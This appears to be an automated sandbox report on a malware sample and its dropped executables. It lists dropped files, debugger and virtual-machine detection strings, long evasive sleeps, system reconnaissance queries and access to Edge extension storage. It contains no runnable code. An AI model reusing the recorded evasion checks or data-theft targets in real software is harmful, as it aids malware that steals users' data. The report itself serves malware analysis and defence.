                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_queue.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\ovdDmGAG.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\THthvKov.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\select.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\psELHGPB.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\GQcIpPoS.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\bbeWvQkg.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\MAhhiIaK.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\IJrrbLaQ.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_bz2.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_lzma.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\eeEmWDhS.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\CjJRSFHW.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\HMPjFLLW.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\vCoCyIOs.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_sqlite3.pydJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\NOQISejH.logJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\PbqyFjSG.logJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\python310.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI69202\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI26762\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17002\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\KVBZghxI.logJump to dropped file
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-18004
                                  Source: C:\ProgramData\Microsoft\hacn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\ProgramData\Microsoft\based.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeAPI coverage: 6.4 %
                                  Source: C:\ProgramData\Microsoft\based.exeAPI coverage: 9.7 %
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 7392Thread sleep count: 352 > 30Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exe TID: 7392Thread sleep time: -352000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 2790 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8328Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 77 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8428Thread sleep time: -11990383647911201s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7332Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 2189 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8332Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 2369 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 80 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep time: -1844674407370954s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep count: 278 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8408Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 8440Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\cmd.exe TID: 9136Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8528Thread sleep count: 2095 > 30
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628Thread sleep time: -2767011611056431s >= -30000s
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8588Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe TID: 5840Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe TID: 8076Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7691A79B0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691A85A0 FindFirstFileExW,FindClose,0_2_00007FF7691A85A0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7691C0B84
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A85A0 FindFirstFileExW,FindClose,1_2_00007FF7691A85A0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691A79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7691A79B0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691C0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF7691C0B84
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0092C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,4_2_0092C4A8
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0093E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,4_2_0093E560
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,5_2_00007FF692987F4C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692978B00 FindFirstFileExW,FindClose,5_2_00007FF692978B00
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692991FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF692991FE4
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF692987F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,5_2_00007FF692987F4C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E2DCE0 FindFirstFileExW,6_2_00000202B6E2DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF7D15479B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D15485A0 FindFirstFileExW,FindClose,6_2_00007FF7D15485A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF7D1560B84
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE64DCE0 FindFirstFileExW,8_2_00000273EE64DCE0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15485A0 FindFirstFileExW,FindClose,8_2_00007FF7D15485A0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D15479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF7D15479B0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1560B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF7D1560B84
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00940B80 VirtualQuery,GetSystemInfo,4_2_00940B80
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeThread delayed: delay time: 922337203685477
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\CacheJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\extJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefpJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\jsJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\defJump to behavior
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                                  Source: s.exe, 0000000B.00000003.1750025071.000000000773B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.1760108075.0000000005C00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RcF33KCGtqeMuNK3lOt
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                                  Source: s.exe, 0000000B.00000002.1767529546.0000000007E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                                  Source: based.exe, 00000008.00000002.2383040815.00000273EDF61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monito&
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                                  Source: based.exe, 00000008.00000002.2378782526.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2354206883.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1909237453.00000273ED2A0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1789613343.00000273ED39F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2376068056.00000273ED2E6000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1869157083.00000273ED39F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: s.exe, 0000000B.00000002.1767529546.0000000007E90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                                  Source: Build.exe, 00000004.00000002.1729756868.00000000081A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                                  Source: based.exe, 00000008.00000002.2383040815.00000273EDF61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monito&&
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                                  Source: based.exe, 00000008.00000003.1868467332.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1872277331.00000273ED8F8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1908986723.00000273ED8E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                                  Source: based.exe, 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeAPI call chain: ExitProcess graph end nodegraph_4-25035
                                  Source: C:\ProgramData\setup.exeProcess information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7691B9924
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB4358A0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,8_2_00007FFDFB4358A0
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0094A640 mov eax, dword ptr fs:[00000030h]4_2_0094A640
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C2790 GetProcessHeap,0_2_00007FF7691C2790
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess token adjusted: Debug
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeProcess token adjusted: Debug
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeProcess token adjusted: Debug
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691B9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7691B9924
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691AC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7691AC44C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691ABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7691ABBC0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691AC62C SetUnhandledExceptionFilter,0_2_00007FF7691AC62C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691B9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF7691B9924
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691AC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF7691AC44C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691ABBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF7691ABBC0
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FF7691AC62C SetUnhandledExceptionFilter,1_2_00007FF7691AC62C
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 1_2_00007FFE1331004C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE1331004C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0094215D SetUnhandledExceptionFilter,4_2_0094215D
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_009412D7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_009412D7
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0094647F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0094647F
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_00941FCA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00941FCA
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69298ACD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF69298ACD8
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69297C860 SetUnhandledExceptionFilter,5_2_00007FF69297C860
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69297BDE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF69297BDE0
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 5_2_00007FF69297C67C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF69297C67C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E27D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000202B6E27D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00000202B6E2D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000202B6E2D2A4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D1559924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7D1559924
